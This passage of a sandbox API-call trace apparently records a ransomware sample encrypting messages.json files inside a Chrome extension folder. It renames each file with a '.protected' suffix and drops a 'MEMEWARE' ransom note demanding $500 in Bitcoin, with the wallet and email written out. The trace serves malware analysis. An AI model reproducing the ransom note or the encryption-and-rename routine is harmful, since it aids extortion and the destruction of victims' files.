lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.486] CloseHandle (hObject=0x164) returned 1 [0083.487] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.487] lstrcmpiW (lpString1="et", lpString2="Windows") returned -1 [0083.487] lstrcmpiW (lpString1="et", lpString2="Program Files") returned -1 [0083.487] lstrcmpiW (lpString1="et", lpString2="Program Files (x86)") returned -1 [0083.487] lstrcmpiW (lpString1="et", lpString2="$Recycle.bin") returned 1 [0083.487] lstrcmpiW (lpString1="et", lpString2="System Volume Information") returned -1 [0083.487] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et") returned 150 [0083.487] lstrcmpW (lpString1="et", lpString2=".") returned 1 [0083.487] lstrcmpW (lpString1="et", lpString2="..") returned 1 [0083.487] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\*") returned 152 [0083.487] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.487] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.487] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.487] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.487] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.487] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.487] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\.") returned 152 [0083.487] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.487] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.487] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.487] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.487] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.487] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.487] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.487] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\..") returned 153 [0083.487] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.487] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.487] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.487] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.487] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.487] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.487] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.487] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.487] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json") returned 164 [0083.488] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.488] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.488] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.488] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.488] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.488] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json") returned 164 [0083.488] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.488] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json") returned 164 [0083.488] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.488] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json") returned 164 [0083.488] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.488] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.495] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.495] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.495] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.495] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.495] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.495] CloseHandle (hObject=0x168) returned 1 [0083.496] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json.protected") returned 174 [0083.496] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\messages.json.protected")) returned 1 [0083.496] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.496] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.497] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\RESTORE_FILES.txt") returned 168 [0083.497] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\et\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.498] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.498] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.499] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.499] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.499] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.499] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.499] CloseHandle (hObject=0x164) returned 1 [0083.499] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.500] lstrcmpiW (lpString1="fa", lpString2="Windows") returned -1 [0083.500] lstrcmpiW (lpString1="fa", lpString2="Program Files") returned -1 [0083.500] lstrcmpiW (lpString1="fa", lpString2="Program Files (x86)") returned -1 [0083.500] lstrcmpiW (lpString1="fa", lpString2="$Recycle.bin") returned 1 [0083.500] lstrcmpiW (lpString1="fa", lpString2="System Volume Information") returned -1 [0083.500] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa") returned 150 [0083.500] lstrcmpW (lpString1="fa", lpString2=".") returned 1 [0083.500] lstrcmpW (lpString1="fa", lpString2="..") returned 1 [0083.500] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\*") returned 152 [0083.500] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.500] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.500] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.500] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.500] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.500] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.500] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\.") returned 152 [0083.500] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.500] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.500] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.500] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.500] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.500] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.500] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.500] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\..") returned 153 [0083.500] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.501] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.501] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.501] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.501] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.501] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.501] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.501] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.501] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json") returned 164 [0083.501] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.501] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.501] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.501] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.501] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.502] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json") returned 164 [0083.502] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.502] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json") returned 164 [0083.502] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.502] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json") returned 164 [0083.502] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.502] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.504] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.504] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.505] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.505] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.505] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.505] CloseHandle (hObject=0x168) returned 1 [0083.505] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json.protected") returned 174 [0083.505] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\messages.json.protected")) returned 1 [0083.506] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.506] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.506] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\RESTORE_FILES.txt") returned 168 [0083.506] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fa\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.506] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.507] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.507] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.507] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.507] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.508] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, 